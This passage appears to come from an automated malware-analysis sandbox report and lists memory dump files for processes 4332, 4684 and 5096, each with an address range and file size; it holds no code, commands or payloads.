                • memory/4332-387-0x0000000074C20000-0x0000000074FAD000-memory.dmp

                  Filesize

                  3.6MB

                • memory/4332-388-0x00000000752C0000-0x00000000752DE000-memory.dmp

                  Filesize

                  120KB

                • memory/4332-389-0x00000000752B0000-0x00000000752BD000-memory.dmp

                  Filesize

                  52KB

                • memory/4332-390-0x0000000075280000-0x00000000752A7000-memory.dmp

                  Filesize

                  156KB

                • memory/4332-219-0x0000000075060000-0x000000007508C000-memory.dmp

                  Filesize

                  176KB

                • memory/4332-391-0x0000000075260000-0x0000000075278000-memory.dmp

                  Filesize

                  96KB

                • memory/4332-136-0x00000000750E0000-0x00000000750F6000-memory.dmp

                  Filesize

                  88KB

                • memory/4332-392-0x0000000075240000-0x000000007525B000-memory.dmp

                  Filesize

                  108KB

                • memory/4332-393-0x0000000075100000-0x000000007523A000-memory.dmp

                  Filesize

                  1.2MB

                • memory/4332-243-0x0000000003850000-0x0000000003BDD000-memory.dmp

                  Filesize

                  3.6MB

                • memory/4332-242-0x0000000074FB0000-0x0000000075059000-memory.dmp

                  Filesize

                  676KB

                • memory/4332-394-0x00000000750E0000-0x00000000750F6000-memory.dmp

                  Filesize

                  88KB

                • memory/4332-395-0x0000000075090000-0x000000007509C000-memory.dmp

                  Filesize

                  48KB

                • memory/4332-109-0x0000000075100000-0x000000007523A000-memory.dmp

                  Filesize

                  1.2MB

                • memory/4332-396-0x0000000075060000-0x000000007508C000-memory.dmp

                  Filesize

                  176KB

                • memory/4332-106-0x0000000075240000-0x000000007525B000-memory.dmp

                  Filesize

                  108KB

                • memory/4332-397-0x0000000074FB0000-0x0000000075059000-memory.dmp

                  Filesize

                  676KB

                • memory/4332-257-0x0000000074C20000-0x0000000074FAD000-memory.dmp

                  Filesize

                  3.6MB

                • memory/4332-398-0x0000000074BB0000-0x0000000074BC0000-memory.dmp

                  Filesize

                  64KB

                • memory/4332-399-0x0000000074BA0000-0x0000000074BAC000-memory.dmp

                  Filesize

                  48KB

                • memory/4332-400-0x0000000074A70000-0x0000000074B89000-memory.dmp

                  Filesize

                  1.1MB

                • memory/4332-305-0x0000000075100000-0x000000007523A000-memory.dmp

                  Filesize

                  1.2MB

                • memory/4332-314-0x0000000074BB0000-0x0000000074BC0000-memory.dmp

                  Filesize

                  64KB

                • memory/4332-312-0x0000000074BA0000-0x0000000074BAC000-memory.dmp

                  Filesize

                  48KB

                • memory/4332-299-0x0000000075310000-0x0000000075823000-memory.dmp

                  Filesize

                  5.1MB

                • memory/4332-300-0x00000000752C0000-0x00000000752DE000-memory.dmp

                  Filesize

                  120KB

                • memory/4332-81-0x0000000074A70000-0x0000000074B89000-memory.dmp

                  Filesize

                  1.1MB

                • memory/4332-78-0x0000000075280000-0x00000000752A7000-memory.dmp

                  Filesize

                  156KB

                • memory/4332-79-0x0000000074BA0000-0x0000000074BAC000-memory.dmp

                  Filesize

                  48KB

                • memory/4332-76-0x0000000074BB0000-0x0000000074BC0000-memory.dmp

                  Filesize

                  64KB

                • memory/4332-70-0x0000000075310000-0x0000000075823000-memory.dmp

                  Filesize

                  5.1MB

                • memory/4332-71-0x0000000074FB0000-0x0000000075059000-memory.dmp

                  Filesize

                  676KB

                • memory/4332-72-0x0000000003850000-0x0000000003BDD000-memory.dmp

                  Filesize

                  3.6MB

                • memory/4332-74-0x00000000752C0000-0x00000000752DE000-memory.dmp

                  Filesize

                  120KB

                • memory/4332-66-0x0000000075060000-0x000000007508C000-memory.dmp

                  Filesize

                  176KB

                • memory/4332-64-0x0000000075090000-0x000000007509C000-memory.dmp

                  Filesize

                  48KB

                • memory/4332-62-0x00000000750E0000-0x00000000750F6000-memory.dmp

                  Filesize

                  88KB

                • memory/4332-60-0x0000000075100000-0x000000007523A000-memory.dmp

                  Filesize

                  1.2MB

                • memory/4332-58-0x0000000075240000-0x000000007525B000-memory.dmp

                  Filesize

                  108KB

                • memory/4332-56-0x0000000075260000-0x0000000075278000-memory.dmp

                  Filesize

                  96KB

                • memory/4332-54-0x0000000075280000-0x00000000752A7000-memory.dmp

                  Filesize

                  156KB

                • memory/4332-30-0x00000000752C0000-0x00000000752DE000-memory.dmp

                  Filesize

                  120KB

                • memory/4332-32-0x00000000752B0000-0x00000000752BD000-memory.dmp

                  Filesize

                  52KB

                • memory/4332-25-0x0000000075310000-0x0000000075823000-memory.dmp

                  Filesize

                  5.1MB

                • memory/4332-357-0x0000000075310000-0x0000000075823000-memory.dmp

                  Filesize

                  5.1MB

                • memory/4332-372-0x0000000075310000-0x0000000075823000-memory.dmp

                  Filesize

                  5.1MB

                • memory/4684-122-0x000000006D4B0000-0x000000006D4FC000-memory.dmp

                  Filesize

                  304KB

                • memory/4684-140-0x0000000007330000-0x0000000007344000-memory.dmp

                  Filesize

                  80KB

                • memory/4684-84-0x0000000004CF0000-0x0000000004D12000-memory.dmp

                  Filesize

                  136KB

                • memory/4684-86-0x00000000056A0000-0x0000000005706000-memory.dmp

                  Filesize

                  408KB

                • memory/4684-85-0x0000000004F90000-0x0000000004FF6000-memory.dmp

                  Filesize

                  408KB

                • memory/4684-107-0x0000000005DA0000-0x0000000005DBE000-memory.dmp

                  Filesize

                  120KB

                • memory/4684-133-0x0000000007730000-0x0000000007DAA000-memory.dmp

                  Filesize

                  6.5MB

                • memory/4684-143-0x0000000007430000-0x000000000744A000-memory.dmp

                  Filesize

                  104KB

                • memory/4684-83-0x0000000005000000-0x0000000005628000-memory.dmp

                  Filesize

                  6.2MB

                • memory/4684-135-0x0000000007160000-0x000000000716A000-memory.dmp

                  Filesize

                  40KB

                • memory/4684-144-0x0000000007410000-0x0000000007418000-memory.dmp

                  Filesize

                  32KB

                • memory/4684-139-0x0000000007320000-0x000000000732E000-memory.dmp

                  Filesize

                  56KB

                • memory/4684-132-0x0000000006FC0000-0x0000000007063000-memory.dmp

                  Filesize

                  652KB

                • memory/5096-220-0x000000006D4B0000-0x000000006D4FC000-memory.dmp

                  Filesize

                  304KB